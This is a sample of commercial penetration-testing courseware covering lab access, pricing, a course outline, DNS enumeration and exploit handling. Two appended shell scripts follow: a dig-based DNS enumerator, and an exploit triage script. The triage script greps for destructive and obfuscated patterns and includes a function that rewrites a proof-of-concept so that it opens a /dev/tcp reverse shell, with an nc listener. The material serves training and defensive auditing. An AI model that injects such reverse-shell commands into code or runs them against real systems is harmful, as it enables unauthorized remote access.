VIRTUAL HACKING LABS PENETRATION TESTING COURSEWARE SAMPLE WWW.VIRTUALHACKINGLABS.COM

Post on 02-Jul-2019


VIRTUAL HACKING LABS

PENETRATION TESTING COURSEWARE SAMPLE

WWW.VIRTUALHACKINGLABS.COM


INTRODUCTION

Our mission is to create the best Virtual Hacking Labs and training materials at an affordable rate for as many (aspiring) information security professionals as possible. The Virtual Hacking Labs wants to provide continuously updated labs and courseware that can be used to maintain the knowledge and skill levels expected from IT security professionals. We also want to make practical training available for anyone aspiring to a job as an ethical hacker or penetration tester. For this reason our courseware starts from the basics and gradually increases in difficulty by covering more advanced subjects.

PENETRATION TESTING LAB

The Virtual Hacking Labs is a penetration testing lab accompanied by extensive courseware covering the most important subjects in the field of penetration testing. The Virtual Hacking Labs contain many real-world scenarios that allow you to learn and practice penetration testing in a safe environment. Many of these scenarios can be found in company IT environments and contain devices such as Domain Controllers, firewalls, Linux and Windows servers, NAS systems, Android devices and of course Windows and Linux clients. All devices and machines in the labs are configured to be intentionally vulnerable and can be exploited in one or more ways.

The courseware that is included with every access pass covers all phases of penetration testing, from enumeration to exploitation. By enumerating the lab machines you will learn how to gather information that can be used for vulnerability assessments and finally to exploit the machines. In the labs you will learn how to enumerate and exploit protocols such as FTP, SNMP and SMB. You will also learn how to exploit web applications that are vulnerable to Remote Code Execution, SQL injection, Local File Inclusion, Remote File Inclusion and many more vulnerabilities. After getting an initial command line shell on an exploited target, you will have the opportunity to practice the privilege escalation techniques used to upgrade the current shell to administrator privileges.

LAB ACCESS

Access to the Virtual Hacking Labs is provided through a VPN client which connects you to the network as if it were a real company network. We provide several popular pre-configured penetration testing distributions such as Kali Linux and Parrot Security OS. Installing the penetration testing distribution of your choice is very easy and usually consists of a few clicks.

VULNERABLE HOSTS

In the labs you will learn how to compromise both Windows and Linux hosts running web servers, mail servers, development tools and many more services and protocols. You will also encounter network devices like virtual firewalls, routers and NAS systems commonly used in both personal and enterprise settings. Every system is configured to contribute to a specific learning experience using one or more attack vectors.

We add new machines, and recently discovered high-impact vulnerabilities, to the labs on a monthly basis. This is how we keep your knowledge and experience up to date.

ABOUT US

The Virtual Hacking Labs is an InfoSec e-learning company focusing on practical penetration testing training solutions. We believe that the most effective and efficient learning approach is to combine practical scenario-based training with easy to understand courseware. To deliver this learning experience we have created a full virtual penetration testing environment called The Virtual Hacking Labs.


TRAINING MATERIALS

Along with the lab access we provide all the written courseware and documentation needed to learn penetration testing and be successful in the labs. We keep the training material continuously up to date to make sure you learn the latest insights and techniques in the field of ethical hacking.

The courseware is written in a way that is easily understandable for anyone new in the field of penetration testing. We start with the very basics of penetration testing and gradually increase the difficulty by covering more advanced subjects.

RESET PANEL

The Virtual Hacking Labs reset panel can be used to reset hosts in the lab network back to their original state. Resetting a host is particularly useful when a host has been left in a state where it is no longer vulnerable. Resetting the host gives you a fresh start on the machine. Every student is allowed to reset a host every 15 minutes through the reset panel. This guarantees the learning experience works as designed, without delays.

STUDENT PANEL

All students have access to a dedicated student panel that can be used to track your course and lab progress. This panel also provides information about the lab machines, including hints for anyone who is stuck on a specific box. This way you can choose what your learning path will look like.

Do you prefer a full black box approach and root all machines on your own or do you prefer a balance between theoretical and practical part of the course with some help along the way?

The hints are not direct solutions for the lab machines but they contain enough information to push you in the right direction. To keep the Virtual Hacking Labs challenging for everyone we only provide hints for the Beginner and Advanced machines. The Advanced+ hosts are the final challenge and are excluded from hints.


CERTIFICATE OF COMPLETION

Anyone who has obtained root/administrator access on at least 20 lab machines can request a Certificate of Completion. This trophy consists of a PDF certificate with your name and a set of badges to use on social media such as LinkedIn. The VHL Certificate of Completion is included at no additional cost with a month pass and greater.

To be eligible for the VHL Certificate of Completion you need to:
1. Get root/administrator access on at least 20 lab machines.
2. Supply documentation of the exploited vulnerabilities.
3. Supply screenshots proving that you rooted the lab machines.
4. Supply the contents of the key.txt files from the rooted lab machines.

The documentation should at least contain information about the exploited vulnerabilities, such as the CVE IDs, the exploits used and screenshots of the exploitation process. The screenshots should contain at least the following information: the lab machine IP, your IP and the commands used (command line, URLs, requests etc.). For privilege escalation also include screenshots with the output of the id/whoami/getuid command before and after executing the exploit.

After submitting the documentation we will manually verify the information and check the authenticity of the screenshots. Be sure to include your student ID and full name to display on the Certificate of Completion in the documentation. Also use the e-mail address you have signed up with to the Virtual Hacking Labs. When the supplied documentation and screenshots have been approved we will send the Certificate of Completion as soon as possible.

PRICING

Access passes include full access to our labs, the online courseware, the courseware e-book and a Certificate of Completion. The exception is the week pass, which does not include the certificate or the e-book version of the courseware.

1 week access: $49 / €46
1 month access: $99 / €93
3 month access: $249 / €233
6 month access: $449 / €419
1 year access: $749 / €699

Completing the penetration testing course may qualify you for 40 (ISC)² CPE and EC Council credit hours. The Certificate of Completion can be used as proof for completing the course.


COURSE TABLE OF CONTENTS

1. PENETRATION TESTING BASICS
   1. Intro
   2. About Penetration testing
   3. The Penetration process explained
   4. Jobs and professional opportunities

2. ACCESSING THE LABS
   1. Intro
   2. Installing Kali Linux
   3. VPN Access
   4. Reset panel
   5. Rules & Restrictions
   6. Legal
   7. Certificate of Completion
   8. Where to start from here?

3. INFORMATION GATHERING
   1. Intro
   2. Passive information gathering
   3. Active information gathering

4. VULNERABILITY ASSESSMENT
   1. Intro
   2. Metasploitable 2 enumeration information & Vulnerabilities
   3. Vulnerability & Exploit databases
   4. Nmap scripts
   5. OpenVAS automated vulnerability scanning

5. EXPLOITATION
   1. Intro
   2. How to work with exploits and where to find them
   3. Compiling Linux kernel exploits
   4. Compiling Windows exploits on Linux
   5. Transferring exploits
   6. Exploiting vulnerabilities in practice

6. PRIVILEGE ESCALATION
   1. Intro
   2. Privilege escalation on Linux
   3. Privilege escalation on Windows

7. WEB APPLICATIONS
   1. Intro
   2. Local and Remote File Inclusion (LFI/RFI)
   3. Remote Code Execution
   4. Remote Command Execution
   5. SQL Injection Basics
   6. Web shells
   7. File Upload Vulnerabilities

8. PASSWORD ATTACKS
   1. Intro
   2. Generating password lists
   3. Windows passwords and hashes
   4. Cracking hashes with John
   5. Web application passwords

9. NETWORKING & SHELLS
   1. Intro
   2. Netcat shells
   3. Upgrading a Netcat shell to Meterpreter

10. METASPLOIT
   1. Intro
   2. Basic Commands
   3. Exploit Commands
   4. Meterpreter Basics


3.2 PASSIVE INFORMATION GATHERING

Passive information gathering is the process of collecting information about a specific target from publicly available sources. This kind of information gathering is all about 'getting to know your target'. It is usually performed before the actual penetration test on the network starts and often returns valuable information for later stages of the test. Many companies leak information, intentionally or unintentionally, that can be picked up by attackers without touching the company's servers. Such leaked information can be combined with other findings and becomes very useful later on. Think of employee names combined with the company's naming convention for account names. Social media and company blogs are also great sources for passive information gathering.

Passive information gathering activities should focus on identifying IP addresses, (sub)domains, external partners and services, technologies used, people employed and any other useful information. The results can include employees working at the company, e-mail addresses, websites, external services used, customers, naming conventions, e-mail and VPN systems and sometimes even passwords. The sources that can be used for passive enumeration are numerous and include, among many others:

• Google
• Social media like LinkedIn, Twitter & Facebook
• Company websites
• Press releases
• Forums
• Whois databases
• Data breaches

SEMI PASSIVE INFORMATION GATHERING

Earlier we mentioned that passive information gathering does not touch company servers or leave traces in logs on target systems. When information gathering does connect to (company) servers but looks like regular traffic, we call it semi passive information gathering. An example is visiting the company website to collect information about employees. This is directly engaging with the target, because we connect to a server that is owned or at least managed by the company. Because the traffic is indistinguishable from ordinary visitor traffic, it is considered semi passive.

DNS ENUMERATION

DNS enumeration is the process of identifying the DNS servers and the corresponding DNS records of a target. DNS stands for Domain Name System, a distributed database that maps domain names to IP addresses and other data. The DNS records are the database entries that associate names with addresses and services. The most important records for DNS enumeration are:

• A (address) records, containing the IPv4 address of a name (AAAA records hold the IPv6 address).
• MX (mail exchange) records, listing the mail servers for the domain.
• CNAME (canonical name) records, which alias one name to another, for example a sub-domain to an existing host record.
• NS (name server) records, indicating the authoritative name servers for the domain.
• SOA (Start of Authority) records, which contain the primary name server, the e-mail address of the party responsible for the domain and a serial number that changes every time the zone is updated.
• PTR (pointer) records, which map an IP address back to a hostname (reverse DNS).
• TXT records, which contain free text inserted by the administrator, such as notes or mail policy records.

The information retrieved with DNS enumeration consists of name servers, IP addresses of potential targets such as mail servers, sub-domains, etc. Tools included with Kali Linux for DNS enumeration include whois, nslookup, dig and host, and automated tools such as Fierce, DNSenum and DNSrecon. Let's go through these tools briefly and see how we can use them for DNS enumeration.

To read further, please purchase an access pass on our website www.virtualhackinglabs.com
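The record types from the DNS enumeration section, queried with dig and followed up the way an enumeration run would (mail servers resolved, A records reverse-resolved). This is an added example and not code from the VHL courseware; example.com and the 192.0.2.0/24 addresses are documentation values assumed for illustration, not lab hosts.

```shell
#!/bin/sh
# Added example, not part of the VHL courseware: a small DNS enumeration
# helper around `dig`, the tool the section names. example.com and the
# 192.0.2.0/24 range are documentation values used as assumptions here.

# Build the reverse-lookup name for an IPv4 address.
# 192.0.2.10 -> 10.2.0.192.in-addr.arpa
ptr_name() {
    printf '%s\n' "$1" | awk -F. '{ print $4 "." $3 "." $2 "." $1 ".in-addr.arpa" }'
}

# Read `dig +noall +answer` lines (owner TTL class TYPE rdata) on stdin and
# print only the rdata of records of the given type. For MX the priority
# field is skipped so that only the mail server names remain.
rdata_of() {
    awk -v t="$1" '$4 == t { if (t == "MX") print $6; else print $5 }'
}

# Query the record types listed in the section, then follow up on what they
# reveal: resolve the mail servers and reverse-resolve every A record.
dns_enum() {
    domain="$1"
    for type in A AAAA MX NS SOA TXT CNAME; do
        echo "== $type $domain"
        dig +noall +answer "$domain" "$type"
    done
    echo "== mail servers (MX -> A)"
    for mx in $(dig +noall +answer "$domain" MX | rdata_of MX); do
        echo "$mx $(dig +short "$mx" A | tr '\n' ' ')"
    done
    echo "== reverse lookups of A records"
    for ip in $(dig +short "$domain" A); do
        echo "$ip -> $(ptr_name "$ip")"
        dig +noall +answer -x "$ip"
    done
}

# Run only when a domain is given, e.g.: sh dns_enum.sh example.com
if [ "$#" -gt 0 ]; then
    dns_enum "$1"
fi
```

Run it as `sh dns_enum.sh example.com`. Note that every lookup goes through the resolver of the attack box and ends up at the target's authoritative name servers, so unlike the sources listed above this is active (at best semi passive) enumeration that can appear in the target's DNS logs.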


5.2 HOW TO WORK WITH EXPLOITS

In the previous chapter we used the Exploit-DB website and searchsploit to verify that exploits are available for the discovered vulnerabilities. Now we will look at where to go from there, because these exploits will not download, modify and execute themselves (hopefully). After we have found an exploit for a known vulnerability we need to do a couple of things before we can safely launch it against a target.

Most exploits are scripts written in Python, Perl, Ruby or Bash and need to be downloaded to the attack box. On the attack box we analyse the exploit code to confirm that it does exactly what it advertises. We don't want to open a backdoor on the attack machine, wipe an entire hard drive on the target with a remote root exploit, or add a machine to a botnet. After we have verified that we are dealing with an authentic exploit we often need a few modifications to make it work for our target. These range from simply setting a host, port or credentials in variables to replacing bind/reverse shellcode and adjusting offsets in buffer overflow exploits.

Many exploits are written as proofs of concept (PoC), which means the script only proves that a target (service) is vulnerable. A proof of concept for a remote code execution vulnerability might just execute the ifconfig command and display the output on a web page. That is of little use when you want a shell on the host, but it does prove that the command in the exploit was executed. The modification for such an exploit consists of replacing the ifconfig command with a reverse or bind shell command.

Another reason to read through the exploit code is for usage instructions. Most scripts take one or more arguments, such as a target host, a port and sometimes credentials. Many exploits print their usage to the terminal when executed without arguments, but remember that we are not executing anything yet at this stage. By analysing the code we can find out which arguments are needed and how they are processed. When a supposedly remote exploit does not take a target host as an argument at all, you are probably dealing with a fake and potentially dangerous exploit.

So far we have talked about exploits written in scripting languages such as Python and Perl, which run under an interpreter. Many other exploits are written in compiled languages like C and need to be compiled before we can execute them. This is often the case for privilege escalation exploits for Linux and Windows. In the following chapters we will learn how to compile local privilege escalation exploits for both.

Now that we know the tasks ahead of us before we can start executing exploits, let's walk through the process by downloading, analysing, modifying and compiling some exploits.

DOWNLOADING EXPLOITS

Before we can start modifying an exploit we first need to download it to the attack machine. Transferring exploits to target hosts is covered in a separate chapter, since that involves very different techniques and sometimes different tools. The easiest ways to get an exploit are downloading it from Exploit-DB with a browser or wget, or copying it from the local searchsploit database.

Simply press the download button to download the exploit to your machine:

We can also use wget to download the exploit from the command line:

wget [URL to exploit download] -O 35513.py

Or we can copy the exploit from the searchsploit database:

Be sure to copy the exploit file to another location and not to modify the original. You might need to revert to the original file or need it again some day. Now that we have downloaded (or copied) the exploit we can start analysing and modifying the exploit code.

To read further, please purchase an access pass on our website www.virtualhackinglabs.com
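The download-then-audit workflow described in this section, as an added example that is not from the VHL courseware: copy the exploit out of the local searchsploit database, flag the lines that must be read before anything is run (destructive commands, obfuscated payloads, hard-coded callbacks, argument handling), confirm it takes a target argument, and only then swap the proof-of-concept command for a reverse shell in a separate copy. The exploit ID 35513 is reused from the wget line above only to illustrate the searchsploit call; the file paths and LHOST/LPORT values are assumptions.

```shell
#!/bin/sh
# Added example, not part of the VHL courseware: copy an exploit out of the
# local searchsploit database and triage it before it is ever executed.
# Exploit IDs, paths and LHOST/LPORT values are assumptions for illustration.

# Mirror an Exploit-DB entry into a working directory with `searchsploit -m`,
# so the original under /usr/share/exploitdb stays untouched.
#   fetch_exploit 35513 ./work
fetch_exploit() {
    mkdir -p "$2" && ( cd "$2" && searchsploit -m "$1" )
}

# Print (with line numbers) the lines that deserve a second look before running
# the script: destructive commands, obfuscated payloads, hard-coded remote
# endpoints the exploit might phone home to, and the argument handling that
# tells us how the exploit expects to be called.
audit_exploit() {
    grep -n -E -i \
        -e 'rm +-rf|mkfs|dd +if=' \
        -e 'base64|\\x[0-9a-f]{2}\\x[0-9a-f]{2}|eval\(|exec\(' \
        -e 'https?://|[0-9]{1,3}(\.[0-9]{1,3}){3}' \
        -e 'sys\.argv|ARGV|getopt|argparse|usage' \
        "$1"
}

# Succeed only if the exploit reads a target from its arguments. The section's
# rule of thumb: a "remote" exploit with no target argument is suspect.
takes_target_arg() {
    grep -q -E 'sys\.argv|ARGV|getopt|argparse|\$1|\$\{1\}' "$1"
}

# Replace the proof-of-concept command (ifconfig in the section's example) with
# a reverse shell, writing a new file so the original copy is kept intact.
#   weaponize_poc poc.py poc_rev.py 192.0.2.1 4444
weaponize_poc() {
    sed "s#ifconfig#bash -i >\& /dev/tcp/$3/$4 0>\&1#" "$1" > "$2"
}
```

The audit is deliberately a list of things to read, not a verdict: a hard-coded IP may be a legitimate default or a beacon to someone else's server, and only reading the surrounding code tells you which. Start a listener (for example `nc -lvnp 4444`) before running the weaponized copy.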
